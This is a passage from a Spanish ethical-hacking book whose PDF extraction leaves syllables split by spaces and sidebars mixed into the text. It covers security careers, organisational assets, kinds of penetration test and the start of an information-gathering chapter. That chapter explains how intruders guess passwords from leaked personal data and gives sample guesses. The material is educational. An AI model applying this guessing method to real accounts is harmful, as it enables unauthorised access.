es ta ble cer je rar quías,ni ve les sa la ria les, pla nes de ca pa ci ta ción y jus ti fi car di ver sos ti pos de de ci sio -nes y pro yec tos. -

Es muy im por tan te que en el mé to do for mal de es tu dio no se es tu die me mo ri -zan do los con te ni dos sin llegar a com pren der los, ya que en el mo men to de en -fren tar la pro ble má ti ca, es to com pli ca rá real men te las co sas. En el tra ba jo, es to es im por tan te por que no se pue de es tar goo glean do en me -

34

Con sul tan do a pro fe sio na les en lis tas y dán do les de ta lles. Por Ej., si al guien de sea de di -car se al ci fra do de da tos, es pro ba ble que le re co mien den una li cen cia tu ra en ma te má ti -cas. A quien de sea de di car se a es cri bir pro ce di mien tos o nor ma ti vas, le di rán que es tu dieAna lis ta de sis te mas de in for ma ción, que po see ma te rias co mo Or ga ni za ción y mé to dos.

Có mo sa ber qué ca rre ra ele gir

Hacking Etico - [PDF Document] (38)

dio de una in tru sión de ter ce ros en al gún com po nen te del sis te ma de la or ga ni -za ción o en me dio de una reu nión eje cu ti va. En un exa men, por que los pro fe -so res se da rán cuen ta de que se es tá re ci tan do un con te ni do de me mo ria, ya quetie nen ex pe rien cia en es cu char alum nos o leer sus tex tos año tras año, y es ungra ve error su bes ti mar a un pro fe sor de esa ma ne ra.

Buscador. Uni ver sia (ww w.u ni ver sia .co m.ar) es el bus ca dormás co no ci do de ca rre ras on li ne, a dis tan cia o pre sen cia lesde ni vel uni ver si ta rio o ter cia rio en to da La ti noa mé ri ca.

35

Significa Cis co Cer ti fied Net work As so cia ted y es una cer ti fi ca ción de Cis co re la cio na -da a net wor king. Los con te ni dos es tán re la cio na dos con los mo de los OSI y TCP-IP, ca -blea do es truc tu ra do bá si co, en ru ta mien to, con fi gu ra ción de rou ters, swit ching, con fi -gu ra ción de swit ches, VLAN, y tec no lo gías WAN. Más in for ma ción en www .cis co .com

CC NA

Hacking Etico - [PDF Document] (39)

Tra ba jo & prác ti ca

Na die na ce sa bien do, la prác ti ca ha ce al maes tro.Anó ni mo

Me dian te prác ti ca y tra ba jo se va ad qui rien do ex pe rien cia real y co no ci mien to so -bre el te ma. Se lo gran y me jo ran las me to do lo gías pro pias de tra ba jo, se co no cennue vas fuen tes, tec no lo gías y ma ne ras de abor dar un de sa fío. No se pue de com pa -rar a al guien que co no ce al go por ha ber lo en fren ta do, con al guien a quien só lo selo han ex pli ca do o que lo le yó. Es to es así por que de la teo ría a la prác ti ca hay al -go que se lla ma rea li dad, y és ta sue le trans for mar los re sul ta dos es pe ra dos.

Trabajo. El si tio www .jor na das tra ba joit .co m.arse de di ca a reu nir jó ve nes pos tu lan tes pa ra al gún tra ba jo

o pro yec to IT y po ner los en con tac to con re clu ta do res de las me jo res fir mas.

36

Pa ra ob te ner más co no ci mien tos acerca de las or ga ni za cio nes, es re co men da ble leerel ex ce len te li bro Téc ni cas de or ga ni za ción, sis te mas y mé to dos, de Al ber to R. Lar dent(old school de la organización) y Claves para el desarrollo de la empresa, de FernandoGrosso, más ligado a las e-organizaciones de hoy en día y las nuevas prácticas.

Lec tu ra re co men da da

Hacking Etico - [PDF Document] (40)

Hay que te ner en cuen ta que no só lo por ha cer un cur so de hac ker se es hac ker, nipor ren dir una cer ti fi ca ción de se gu ri dad o por que nos asig nen un tra ba jo de che -queo de se gu ri dad se es un pro fe sio nal. El sa cri fi cio de lle gar a ser un pro fe sio nales real men te al to, y las con se cuen cias que pa de cen las or ga ni za cio nes por no darcon uno acor de a la si tua ción, no son tan bue nas. De allí la gran im por tan cia quetie ne el re clu ta mien to de los pro fe sio na les por par te de la or ga ni za ción.

OR GA NI ZA CIO NES FOR MA LESEl hac king éti co se ha con ver ti do en una he rra mien ta pa ra for mu larun re co no ci mien to de las vul ne ra bi li da des que re pre sen tan una ame -na za a los ac ti vos. El tes tea dor es tá ac tuan do co mo ame na za (hac -ker), en bus ca de las vul ne ra bi li da des que per mi ti rán la ex po si ciónde un ac ti vo, co mo ser: nú me ros de tar je ta de cré di to. Al ha cer eso,la prue ba tie ne el po ten cial de re ve lar los ele men tos fun da men ta lesne ce sa rios pa ra crear una me di da com pren si va y así em plear se gu ri -dad a tra vés de una or ga ni za ción.

Ja mes S. Ti ller

Las lla ma das or ga ni za cio nes for ma les, tal co mo nos en se ñan en la teo ría aca dé mi -ca de cual quier ca rre ra orien ta da a sis te mas, son aque llas em pre sas que per si guenun ob je ti vo a tra vés de pro ce sos ad mi nis tra ti vos, ges tión de in for ma ción y pro duc -ción de ele men tos o ser vi cios pa ra co lo car en un mer ca do so bre de ter mi na do con -tex to, siem pre de mo do le gal y coor di na do. El co mún de la gen te sue le lla mar las gran des em pre sas, cor po ra cio nes o ins ti tu cio -nes, y en es te apar ta do enun cia re mos al gu nos de sus as pec tos principales pa ra daruna no ción muy bá si ca de ellas, siem pre que ten gan una re la ción o in te rac ción conel uso de et hi cal hac king, ya que és te es em plea do en or ga ni za cio nes for ma les. Es -tas or ga ni za cio nes po seen, en tre otras co sas:

37

En las siguientes direcciones: www.universobit.com, trabajoensistemas.com.ar,empleos.clarin.com, bumeran.com.ar, www.zonajobs.com.ar, www.computrabajo.com.ar, issaarba.blogspot.com (ver listado de consultoras) y www.tecnoempleo.com

Postularse para entrevistas de trabajo

Hacking Etico - [PDF Document] (41)

• Di fe ren tes áreas: ope ra ti vas, ad mi nis tra ti va s/e je cu ti vas y ge ren cia les.• Un flu jo de da tos e in for ma ción vi tal y, por tan to, tam bién un al ma ce na mien tode és tos y un pro ce sa mien to.

• Re cur sos hu ma nos, téc ni cos y ló gi cos.• Res pon sa bles.• Pro ce sos.• Es truc tu ras je rár qui cas su je tas a sec to res y de pen den cias (mi rán do lo en un or ga -ni gra ma, des de arri ba ha cia aba jo irán ór de nes, y de aba jo ha cia arri ba irá in for -ma ción de re sul ta dos).

Jerarquias. Or ga ni gra ma de ejem plo. Es tos de fi nen la es truc tu raor ga ni za ti va y es tán ti pi fi ca dos ba jo una nor ma IRAM. Pue de ha cer se

por pro ce sos, de par ta men tos o sec to res, je rar quías y pro duc tos.

Es tas or ga ni za cio nes, den tro de lo que es su sis te ma (lla ma do vul gar men te es ce na rio)e in te gri dad fí si ca to tal, po seen ele men tos vi ta les lla ma dos ac ti vos, co mo lo es la in -for ma ción sen si ble o crí ti ca. Los ac ti vos son muy va ria dos y de ben cla si fi car se tan toen ti po o nú me ro co mo en im por tan cia (cri ti ci dad), aun que só lo ha re mos fo co en elmás im por tan te. Pa ra eso, pri me ro de be mos com pren der que no es lo mis mo ha blarde da tos que de in for ma ción, ya que és ta úl ti ma tie ne una im por tan cia sig ni fi ca ti va pa -ra la em pre sa. Por ejem plo, co mo in for ma ción sen si ble o crí ti ca po de mos men cio nar:

• El lis ta do de clien tes con to dos sus da tos.

38

Hacking Etico - [PDF Document] (42)

• Lis ta do de pro vee do res, com pra do res, so cios.• Cla ves o con tra se ñas.• Ubi ca ción de pun tos de ac ce so pri va dos.• Pla nos.• In for ma ción crí ti ca o con fi den cial de tra ta dos, ne go cia dos, reu nio nes, pau tas, pac tos.• Com bi na cio nes de ca jas fuer tes.• Agen das, ru ti nas de ho ra rio, pro ce sos.• In ven ta rios, pla ni llas de ven ta, com pra y stocks.• Lis ta do de iden ti da des de agen tes.• In for ma ción: per so nal, ca tá lo gos de pro duc tos fu tu ros, cos tos, es ta dís ti cas, son -deos de mer ca do, ba lan ces pri va dos, re sul ta dos, di se ños, re sul ta dos de aná li sis,es tra te gias, par ti ci pa cio nes, ac cio nes, ma te ria les, fór mu las de pro duc tos, ecua -cio nes, gra ba cio nes di gi ta les, te sis, fo tos y films pri va dos, in ves ti ga cio nes, nó mi -nas de pa go, en tre otras tan tas co sas im por tan tes.

Po de mos ima gi nar mu chas si tua cio nes que pue den aten tar con tra es tos ac ti vos de laem pre sa. Por ejem plo, que un in tru so o mal wa re ten ga ac ce so a ellos, que los al te reno los bo rren pa ra siem pre o que los en tre guen a la com pe ten cia o al me jor pos tor.Tam bién exis te una enor me can ti dad de ame na zas na tu ra les, téc ni cas y hu ma nas (co -mo un em plea do des leal que la ro ba o co pia, por ejem plo) que po drían aten tar con traellos. Ló gi ca men te, en es tos tiem pos de al ta com pe ti ti vi dad, el im pac to ne ga ti vo se ríamuy gran de. De to das ma ne ras, de be mos re cor dar que la in for ma ción crí ti ca es tanso lo uno de los ac ti vos que hay que pro te ger, de los tan tos pre sen tes en una or ga ni -za ción.Ac tual men te, las or ga ni za cio nes ne ce si tan se gu ri dad a tra vés de la in cre men ta ciónde la ca li dad en sus pro ce sos y el res guar do de sus com po nen tes (ac ti vos), a tra vésde es tán da res, nor mas, po lí ti cas, con tro les, se gui mien to y la me jo ra con ti nua de és -tos. Pa ra ello se prac ti can au di to rias de se gu ri dad IT, re le va mien tos ex haus ti vos,y re vi sio nes de los pro ce sos, fun cio nes y ta reas re la cio na das con las bue nas prác -ti cas en se gu ri dad. To do ello ha ce a la ges tión de la se gu ri dad de la in for ma ción,co mo ve re mos en el ca pí tu lo 9, que explica en un punto el tema nor ma ti vas.No hay que con fun dir la ges tión de la se gu ri dad de la in for ma ción con la se gu -

39

Si que re mos ob te ner más in for ma ción so bre po lí ti cas y es tu diar pro fun da men te so -bre ellas, po de mos vi si tar los si guien tes si tios:www .se gu-in fo .co m.ar /po li ti cas (hay que re gis trar se en la lista Segu-info) ywww .se gu-in fo .co m.a r/ar ti cu los/59-es cri bien do-po li ti cas-se gu ri dad.htm

Ma te rial acer ca de po lí ti cas

Hacking Etico - [PDF Document] (43)

ri dad in for má ti ca en el as pec to téc ni co. Una co sa es re for zar téc ni ca men te lase gu ri dad de un ser vi dor me dian te har de ning, y otra es, por ejem plo, re dac taruna po lí ti ca de uso de In ter net de mo do se gu ro y res pon sa ble por par te de losem plea dos. A con ti nua ción, ve re mos al gu nos de los des cui dos tí pi cos con losque una or ga ni za ción for mal cuen ta:

• La OF ha cre ci do de mo do de sor de na do y, por si fue ra po co, es tá en ex tre mo in -for ma ti za da, sin se gu ri dad mí ni ma o nor ma ti va de or ga ni za ción al gu na. Es el tí -pi co ca so de in con ta bles em pre sas fa mi lia res que, por di ver sos fac to res po lí ti co-eco nó mi cos, cre cen has ta ser gran des ex por ta do res o im por ta do res, o bien in dus -tria les ma nu fac tu re ros, y agran dan su sis te ma in for má ti co al rit mo de su per so nalsin ló gi ca al gu na, sus ten tan do la se gu ri dad con só lo ac tua li zar el sis te ma ope ra ti -vo de sus ter mi na les y uti li zan do al gún que otro an ti vi rus, de sac tua li za do. Mu chasde es tas em pre sas sa ben que tie nen que im ple men tar se gu ri dad in for má ti ca y dela in for ma ción, pe ro no sa ben có mo abor dar lo.

• La OF es tá acos tum bra da a la reac ción y no a la proac ción (ac tuar de mo do an -ti ci pa do). Aguar da a que su ce da al gún in ci den te pa ra ha cer al go, an tes de im ple -men tar al go de mo do se gu ro y sin ha ber com pro me ti do na da por omi sión, de sin -te rés o des cui do. Mu chas de es tas em pre sas sim ple men te no se in te re san en la in -ver sión pre via en cues tio nes de se gu ri dad, a me nos que se ha yan da do cuen ta deal gún in ci den te de ese ti po, cuan do ya es de ma sia do tar de. No son cons cien tes delos be ne fi cios que tie ne pa ra la or ga ni za ción el pe ne tra tion tes ting o che queo dese gu ri dad (des cu brir las vul ne ra bi li da des del sis te ma an tes de que és tas sean en -con tra das y ex plo ta das por un ter ce ro no au to ri za do u otra ame na za).

• La OF con tra ta per so nal de se gu ri dad con un per fil ina de cua do a su es ce na rio ycon tex to. (más detalles sobre este punto en el Cap9)

• La de pen den cia de su de par ta men to de se gu ri dad ha ce ine fi ca ces sus po lí ti cas.No lo gran la in te rre la ción de sus sec to res y no al can zan el com pro mi so de la ge -ren cia pa ra que la to ta li dad del plan tel aca te las po lí ti cas, dan do lu gar a di fe ren testi pos de pro ble mas. Uno de los in te rro gan tes más co mu nes en es tos ca sos es dequién de be de pen der el de par ta men to Se gu ri dad de la in for ma ción.

• La OF no sa be abor dar la re dac ción de las po lí ti cas de se gu ri dad (o del aná li sisde ries go) o su im ple men ta ción. A ve ces se so la pan con po lí ti cas de or ga ni za ción,con in ci den cia en la di ná mi ca de la in for ma ción in ter sec to rial y co mu ni ca cio nes.

De be mos re cor dar que la in for ma ción sig ni fi ca ti va y a tiem po es vi tal pa ra la to made de ci sio nes en lo ge ren cial, y a la vez de ci si va pa ra lo grar los ob je ti vos de la or -ga ni za ción. El et hi cal hac king apor ta el me ca nis mo pa ra lo grar ca na les (y reposi-torios) más se gu ros pa ra esa in for ma ción y otros ac ti vos.

40

Hacking Etico - [PDF Document] (44)

NET WORK SE CU RITY AS SESS MENTAdén tra te en la na da, aco me te con tra el va cío, ro dea lo que de fien -de, asál ta lo don de no te es pe re. Sun Tzu

(The Art of war)

En las pá gi nas an te rio res de fi ni mos los pun tos más in te re san tes:

• El in tru so co mo ame na za.• La or ga ni za ción for mal (OF) co mo sis te ma o es ce na rio en ries go.• La ges tión y el mé to do or ga ni za ti vo co mo op ti mi za do res de la OF.• El ac ti vo co mo va lor pre cia do de la OF.• El hac king éti co co mo he rra mien ta o me ca nis mo.• El pro fe sio nal de se gu ri dad co mo eje cu tor del tes teo.• Las téc ni cas co mo par te del net work se cu rity as sess ment.

El ma yor con te ni do del li bro se ba sa en es te úl ti mo pun to, pe ro no po día mos lle -gar a él y ver só lo téc ni cas de ta lla das de tes teo sin an tes co no cer de qué se tra ta elres to, ya que im por tan te sa ber dón de en ca ja ca da uno de es tos com po nen tes.

La red es tá lle na de script kid dies (al gu nos de ellos si dejan de perder tiempo yestudian, po drían ser el día de ma ña na pro fe sio na les), y como no sa ben por dón -de em pe zar, lo pri me ro que uti li zan es lo que tie nen a ma no: una he rra mien ta ola des crip ción de ta lla da de una sim ple téc ni ca de in tru sión que le ye ron en al gúnco rreo o fo ro. Acla re mos que un script kid die es aque lla per so na que, sin co no -ci mien to al gu no de pro to co los, sis te mas ope ra ti vos, ni se gu ri dad de la in for ma -ción, se va le de una he rra mien ta o téc ni ca aje nas pa ra co me ter in tru sio nes en In -ter net u otras re des, o al me nos in ten tar lo. Ló gi ca men te, pue de te ner las más di -ver sas in ten cio nes. Por otro lado, nneett wwoorrkk ssee ccuu rriittyy aass sseessss mmeenntt, es uno de los nom -bres que sue le te ner el pe ne tra tion tes ting o che queo de pe ne tra ción, tam bién co no -ci do co mo tes teo de vul ne ra bi li da des, prue ba de pe ne tra ción o hac king éti co, co -mo sue le lla már se lo por es tos días. El be ne fi cio de és te pa ra la or ga ni za ción es queella se co noz ca a sí mis ma en cues tio nes de vul ne ra bi li da des y po ten cia les bre chasde se gu ri dad en el sis te ma de in for ma ción, emulando en ataques tanto a script ki- ddies como tambien, a hábiles intrusos. Es te che queo de se gu ri dad pue de ser ex ter no si es des de In ter net ha cia un si tio web dee-com mer ce o ha cia ter mi na les de una red cor po ra ti va o com po nen tes de és ta; o in ter -no si es des de de una mis ma red, emu lan do un em plea do o bien un in tru so que ha lo -gra do in gre sar des de el ex te rior a la red in ter na de la or ga ni za ción. Es siem pre de ca -rác ter téc ni co, al con tra rio de una au di to ria de se gu ri dad IT en la que se com prue ban

41

Hacking Etico - [PDF Document] (45)

o pa san a re vi sión las po lí ti cas y los pro ce di mien tos. Tam bién pue de de no mi nár se lo co -mo:• Whi te Box Test: es un che queo lle va do a ca bo por un pen tes ter que tie ne to dala in for ma ción acer ca del sis te ma.

• Black Box Test: es te che queo es lle va do a ca bo des de ce ro, sin in for ma ción, talco mo lo ha ría un in tru so cual quie ra y lle va mu cho más tiem po.

• Grey Box Test: se cuen ta con co no ci mien tos par cia les del ob je ti vo, siem pre brin -da dos por la mis ma or ga ni za ción.

Ge ne ral men te, las or ga ni za cio nes se ali nean ba jo al gu na me to do lo gía pa ra rea li zar eltes teo, aun que otras más ver sá ti les op tan por ha cer lo de mo do más ar te sa nal, lo cualno sig ni fi ca gran di fe ren cia siem pre y cuan do el pro fe sio nal se pa di ri gir el as sess -ment (ata que) ade cua da men te y no de je ob je ti vos, de ta lles o tra mos ol vi da dos.

Materia. En el pro gra ma de 5º año de In ge nie ría en Sis te mas, la Uni ver si dad Abier ta In te ra me ri ca na (www .va ne du c.e du.a r/uai/) po see la ma te ria Se gu ri dad In for má ti ca. Com pren de: ci fra dos, se gu ri dad de la in for ma ción (aná li sis de ries go, con tin gen cia, au di to rias), de tec ción de in tru sos, se gu ri dad en red, fil tra do de pa que tes y fi re walls,

hac king y ad mi nis tra ción se gu ra de pla ta for mas y apli ca cio nes (har de ning).

Pa ra evi tar cir cuns tan cias in de sea das, exis te la pla ni fi ca ción pre via, que sir ve pa rade ter mi nar el al can ce que ten drá, los lí mi tes, los ob je ti vos y la bue na uti li za ción dere cur sos. En mu chos ca sos, se dis cu te quién de be ría lle var lo a ca bo, si per so nalpro pio de la or ga ni za ción o ter ce ros con tra ta dos. Pa ra to mar es ta de ci sión, en traen jue go la éti ca de los in te gran tes del de par ta men to de sis te mas y el de se gu ri dadin for má ti ca, da do que tie nen que re por tar fa llas o im ple men ta cio nes de fi cien tes,qui zá lle va das a ca bo por co le gas de la mis ma ofi ci na. Hay que pres tar su ma aten -ción a los con flic tos de in te re ses que pue den crear se en em plea dos, ad mi nis tra do -res y ana lis tas de una mis ma em pre sa en una bús que da de es tas ca rac te rís ti cas.

42

Hacking Etico - [PDF Document] (46)

Al ser ana lis ta ex ter no, generar un reporte de seguridad detallado es una incógnitapara los empleados de seguridad o sistemas de la organización que nos hacontratado, hasta que se entrega. La ética difícilmente pueda ser menoscabada,aunque los recursos utilizados (tiempo, herramientas, dinero y recursos humanos)suelen ser mayores.Al ser analista interno, se facilita la tarea porque se conoce mejor y de modo real elsistema de información, y por tanto disminuyen los recursos utilizados y se complicaen otros aspectos. En algunas organizaciones es muy común que, al encontrar algo,se avise al colega administrador o analista para que lo solucione y así no figure en elreporte. Si bien eso sería mitigar rápido el problema, es una falta de ética profesionaly un ejemplo de innumerables vicios relacionados.Lo más recomendable es que se implemente todo de manera correcta y, en loposible, que se desarrolle el sistema desde cero. Luego de realizar relevamientosexhaustivos, conviene que se planifique y se definan los procesos adecuadamente(hasta la dependencia más primitiva), ya que en el transcurrir del tiempo deberán sersiempre depurados. También hay que tener en cuenta la escalabilidad a futuro y unplan de contingencia para asegurar la continuidad del negocio y el procesamiento dedatos.La idea es llegar a un nivel de organización y de seguridad maduro que sea auditadoy chequeado por analistas externos junto a analistas de organización y métodos.Crear un comité para debatir los resultados e implementaciones, y mitigar lasfalencias encontradas de modo serio. Controlar y auditar para mejorar, reclutarverdaderos talentos y formarlos más aun en la empresa.Todo esto es valor agregado en la búsqueda del objetivo por parte de la orga-nización, por tal motivo, hay que tratar de cumplir muy bien nuestro rol si vamos adedicarnos de lleno al tema.

Sitios de Educación.

www.sistemas.frba.utn.edu.arwww.caece.edu.ar/Grado/Ing_Sistemas.asp

www.isec-global.comwww.rsa.com/training/pdfs/EDCRS_GD_1004.pdfwww.checkpoint.com/services/education/certification

www.cisco.com/web/learningwww.comptia.org

www.itmaster.com.arwww.itcollege.com.ar

43

Hacking Etico - [PDF Document] (47)

www.centraltech.com.arwww.cybsec.com/ES/servicios/capacitacion.php

www.bs.com.arwww.proydesa.org

Noticiaswww.derkeiler.comwww.net-security.orgwww.seclists.org

www.securitytracker.com/signup/signup_now.htmlwww.microsoft.com/technet/security/www.kernel.org/pub/linux/docs/lkml/

http://lists.grok.org.uk/pipermail/full-disclosurewww.hispasec.com

www.securiteam.com/mailinglist.htmlwww.whitehatsec.com

www.segu-info.com.ar

Es un sitio dedicado a la seguridad de la información con una gran comunidad.Cuenta con varios mailing lists, y los temas centrales de éstos son la seguridad de lainformación, la seguridad informática y las leyes relacionadas con la seguridad de lainformación. Se llevan a cabo tanto discusiones entre profesionales comoconcientización sobre seguridad a gente que utiliza recursos tecnológicos e Internet.

44

Hacking Etico - [PDF Document] (48)

2 > RecabarinformaciónTécnicas usuales que se utilizan para la

recolección de datos antes de la emulación

de un ataque. Asimismo, veremos la

preparación de los medios, la enumeración

y la clasificación de los datos obtenidos

para la definición o la planificación del

asalto al objetivo.

Todo esto mostrado tanto desde el punto de

vista de un profesional ético, como en el

de un intruso, para hacer notorias las

diferencias.

Hacking Etico - [PDF Document] (49)

INFORMATION GATHERINGSe denomina information gathering a la instancia previa al intento de ejecutar unaintrusión informática a un sistema por parte de alguien no autorizado. También esempleada (generalmente en organizaciones) por los profesionales éticos en caso deasestar una comprobación de seguridad. Information gathering implica llevar a ca-bo la tarea previa y minuciosa de inteligencia (similar a un reconocimiento del te-rreno), más precisamente a llaa rree ccoo lleecc cciióónn ddee ddaa ttooss aacceerr ccaa ddeell oobb jjee ttii vvoo oo ddee aall ggúúnn ccoomm --ppoo nneenn ttee rree llaa cciioo nnaa ddoo aa eess ttee oo aa ppaarr ttee ddee ééll. Es ta fa se se com po ne, fun da men tal men te,de in ves ti ga ción y aná li sis de da tos re ca ba dos.El sis te ma de in for ma ción cuen ta con in con ta bles pie zas y, por lo tan to, el fac torper mea ble (bre cha o agu je ro de se gu ri dad) ini cial de és te po dría en con trar se encual quie ra de los ni ve les, com pren di dos en tre una fa lla hu ma na, una de in fraes truc -tu ra (téc ni ca), ló gi ca y has ta ex ter na por los agen tes in vo lu cra dos (por ejem plo, unpro vee dor de In ter net o hos ting in se gu ro o una su cur sal con su red des pro te gi da)o dis tin tos am bien tes in ter co nec ta dos.Los da tos que bus can los in tru sos an tes de ata car pue den es tar re la cio na dos con al -gún em plea do, ya sea eje cu ti vo u ope ra rio, con al gún sis te ma o tra mo de él o conal gún pro ce di mien to u ope ra ción que nos per mi ta in ter ve nir en él. Tam bién pue deser una di rec ción IP, un si tio, una red, una apli ca ción, un ser vi cio (puer to abier tode au ten ti fi ca ción o no), un pro to co lo, un de ter mi na do des cui do de pro gra ma cióno de ad mi nis tra ción, un di rec to rio, un do cu men to, una pla ta for ma o bien cual quierda to de ubi ca ción fí si ca o de no mi na ción de al gún sec tor de la mis ma or ga ni za ción.Por su pues to, si pue de di rec ta men te con se guir lo gins, lo in ten ta rá. No in te re sa si el da to es muy im por tan te o ca si in sig ni fi can te. To do es útil a la ho -ra de la es ca la da en el sis te ma y la pre via pla ni fi ca ción de es te em ba te (che queo osi mu la ción de ata que). Al gu nas de las pre gun tas úti les an tes de pro ce der se rían:

• ¿Qué sa be mos de nues tro ob je ti vo?• ¿Dón de es tán sus re des, si tios o por dón de flu ye su in for ma ción?• ¿Qué par tes lo con for man?

46

Pla ta for ma, ar qui tec tu ra y sis te ma ope ra ti vo no son lo mis mo. La ar qui tec tu ra es in ter na delhard wa re y a quien va di ri gi do un sis te ma ope ra ti vo. Vea mos al gu nos ejem plos, con la ar qui -tec tu ra en tre pa rén te sis: Di gi tal UNIX (alp ha), FreeBSD (i386), Li nux (i386, m68k, alp ha, po -werpc, mips, arm), SCO (i386), So la ris (sparc, sparc64, i386, m68k), Win dows (i386, amd64).

Pla ta for ma, ar qui tec tu ra y sis te ma ope ra ti vo

Hacking Etico - [PDF Document] (50)

• ¿Qué sis te mas po seen y co mo es tán for ma dos?• ¿Có mo se lla man los in te gran tes de la or ga ni za ción?• ¿Quié nes son sus em plea dos y qué ha cen? ¿Có mo y dón de?• ¿Qué in for ma ción so bre ellos se pue de con sul tar o con se guir en In ter net?

Un via je de 1000 le guas co mien za con el pri mer pa so, de cían los chi nos. Así, porejem plo, sa ber con qué pla ta for mas va mos a tener que li diar o co no cer al gu nosusua rios del sis te ma, es un buen co mien zo.

Online. En es te si tio www .learn se cu rit yon li ne .com po de mosen con trar cur sos gra tui tos pa ra apren der so bre se gu ri dad, fo ros

pa ra con sul tar a co le gas, vi deos so bre téc ni cas de in tru sión y de sa fíos.

Co mún men te, se de no mi na ffoooott pprriinn ttiinngg (si guien do la hue lla de pi sa das) a es ta re co lec -ción de in for ma ción pre via. De to dos mo dos, ca da ata can te o con sul tor tie ne sus pro -pios mé to dos y re cur sos du ran te es ta bús que da. Mien tras más mi nu cio sa e in ge nio sasea, más po si bi li da des ten drá de dar con un des cui do, un ob je ti vo o por lo me nos, unapis ta pa ra co men zar con otra eta pa del em ba te. Por ejem plo, un ata can te real que po -see en su ha ber al gu nas o la ma yo ría de las ba ses de da tos de ISP (pro vee do res de In -ter net) del país, o tie ne ac ce so a ellas, cuen ta con una cla ra ven ta ja so bre el res to yaque, en és tas, po si ble men te ha brá mu cha in for ma ción útil re la cio na da con per so nasde la or ga ni za ción que pue den te ner al gún da to im por tan te, co mo pass words, o per -mi ten con se guir lo. Es tos da tos pue den ser vir pa ra com pro me ter el sis te ma o par te de

47

Hacking Etico - [PDF Document] (51)

él.La ven ta ja del in tru so en es ta fa se del ata que, si se lo com pa ra con el hac ker éti co opro fe sio nal, es ma yor, da do que pue de uti li zar re cur sos no éti cos pa ra la ex trac ción ore co lec ción de in for ma ción pa si va (o no) del ob je ti vo. El co no ci mien to de es tas ven -ta jas por par te del pro fe sio nal, y sa ber có mo li diar con ellas, ha rá que el sis te ma quese quie re pro te ger ten ga la nor ma ti va ade cua da y con tro la da, lue go de un ex haus ti voche queo.

Con sul tas a ba ses de da tos La re co lec ción de da tos pre vios al ata que ge ne ral men te co mien za en al gún ti po deba se de da tos y otros re cur sos que se dis pon gan. Cuando son he chas por un in tru -so, es tas re co lec cio nes a ve ces no son le ga les. Un ejem plo de con sul ta a ba se de da -tos ile gal se ría el ca so an tes men cio na do: el in tru so que ten ga en su po der una ba -se de da tos de al gún ISP en el que fi gu ran, por ca sua li dad, los da tos per so na les deal gu nos in te gran tes de la or ga ni za ción que ata ca rá.És te, lue go de co te jar las coin ci den cias de per so nas (exis ten cia tan to en la ba se deda tos co mo en la or ga ni za ción), to ma rá los da tos per so na les de ellos y, ac to se gui -do, tra ta rá de em plear co mo pass words sus fe chas de na ci mien to, sus nú me ros dedo cu men to, sus ofi cios y los mis mos pass words allí uti li za dos, pe ro es ta vez en lascuen tas de co rreo de la or ga ni za ción u otro ser vi cio que re quie ra au ten ti fi ca ción(como ssh, ftp, rlo gin o tel net, por ejemplo).En tre otras téc ni cas (co mo por ejem plo la de in ge nie ría so cial que ve re mos más ade -lan te), tam bién ba sa do en esos da tos, tra ta rá de des ci frar la en tro pía y com po si ción desus pass words. Vea mos al gu nos ejem plos. Si en su cuen ta per so nal la víc ti ma tie ne unapre gun ta se cre ta re la cio na da con un li bro (su pon ga mos El prin ci pi to) o en cuen tra enun fo ro que a esa per so na le in te re sa ese li bro, el in tru so pro ba rá cla ves co mo las si -guien tes: el prin ci pi to, zo rro, in vi si blea lo so jos, ví bo ra, an toi ne, exu pery, bao bab, as te roi -de3251, b612, ro sa, et cé te ra. En otros ca sos, si el usua rio años atrás uti li za ba en suscuen tas de ISP cla ves co mo ma ra do na10, el in tru so tam bién pro ba rá con ma ra do na,d1o5, dios, ca pi tan, ma no de dios, die goar man do, la pe lo ta no se man cha, die gui to, 10ma -

48

El pro fe sio nal pue de mi ti gar pro ble mas re dac tan do, por ejem plo, una po lí ti ca in ter naque dic te a sus em plea dos: no uti li zar pass words re la cio na dos con uno mis mo ni uti li -zar esas cla ves en otros am bien tes per so na les. Otra for ma se ría asig nar un de ter mi -na do pass word, eli mi nan do así la po si bi li dad de li bre y ma la elec ción del em plea do.

Pa lia ti vos

Hacking Etico - [PDF Document] (52)

ra do na, pe lu sa, et cé te ra, tra tan do de dar con al gu na for ma ac tual o evo lu cio na da de lacla ve, ya que es muy pro ba ble que el usua rio hoy en día tam bién las uti li ce, o bien, quelas ha ya he re da do y las use en otras apli ca cio nes de lo gueo (au ten ti fi ca ción-ac ce so).In clu so los da tos per so na les (co mo nom bre y ape lli do) ser vi rán pa ra de du cir losusua rios de lo gin y no so lo la cla ve. El tí pi co ejem plo es el Use rID (el usua rio quean te ce de al sig no @) de las ac tua les cuen tas de e-mail cor po ra ti vas e ins ti tu cio na les,for ma das por la pri me ra le tra del pri mer nom bre, se gui do del ape lli do. Por ejem plo,cto ri @do mi nio vic ti ma .com. In for ma ción co mo és ta le ser vi rá al in tru so pa ra sa carmás in for ma ción aún, qui zá des de otros lu ga res. Es ta per so na, ade más, bus ca rá enba ses ile ga les, co mo la de tar je tas de cré di to, en ti da des de apor tes ju bi la to rios, pa -dro nes de to do ti po (dis po ni bles has ta en re des P2P), en ti da des pri va das o ba ja dasde ser vi do res de or ga ni za cio nes que fue ron pre via men te ata ca das y com pro me ti das.Pa ra el in tru so, una fuen te de pass words o da tos sen si bles de ese es ti lo es de re le -van cia atem po ral. Esto significa que no im por ta si la ba se de da tos que tie ne en supo der es vie ja, ya que po drá usar se en un fu tu ro co mo da to sig ni fi can te o co mopis ta pa ra con se guir el da to ne ce sa rio ac tual.Es co mún ade más que és te, más allá del aná li sis íntegro del si tio ins ti tu cio nal delob je ti vo, bus que tam bién in for ma ción de al gún com po nen te de la or ga ni za ción enpor ta les o si tios re la cio na dos con pos tu la cio nes la bo ra les (mi les de cu rrí cu lum ví -tae), in for ma ción de ries go cre di ti cio, reim pre sión de pa ten tes de au to mó vi les, pa -dro nes de vo ta ción, fo ros, blogs y co mu ni da des on li ne de to do ti po, jui cios o por -ta les de le yes, even tos, re gis tros de do mi nios, por ta les de edu ca ción, guías em pre -sa ria les, te le fó ni cas, pro fe sio na les e in dus tria les, bús que da de co le gas, re des so cia -les ti po Lyn ke din, Facebook, Sonico, Eco noz co o Mys pa ce, avi sos cla si fi ca dos deto do ti po, po li cía y agen cias de se gu ri dad on li ne. Co mo ve mos, la lis ta es muy ex ten sa.Se gu ra men te, el in tru so tra ta rá de com pro me ter cual quie ra de es tos lu ga res pa ra ex -traer la in for ma ción en ca so de que és ta no sea pú bli ca o de que ha ya que pa gar pa -ra con sul tar la. Si los sis te mas de esos lu ga res son bas tan te se gu ros, en ton ces in ten -ta rá com 